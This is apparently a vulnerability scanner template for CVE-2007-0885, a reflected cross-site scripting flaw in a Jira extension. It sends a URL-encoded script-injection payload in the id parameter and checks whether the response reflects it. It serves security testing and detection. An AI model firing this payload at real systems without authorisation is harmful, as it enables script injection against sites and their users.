id: CVE-2007-0885

info:
  name: Rainbow.Zen Jira XSS
  author: geeknik
  severity: medium
  description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
  reference:
    - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
    - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
    - http://www.securityfocus.com/bid/22503
  classification:
    cve-id: CVE-2007-0885
  tags: cve,cve2007,jira,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><script>alert(document.domain)</script>'

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"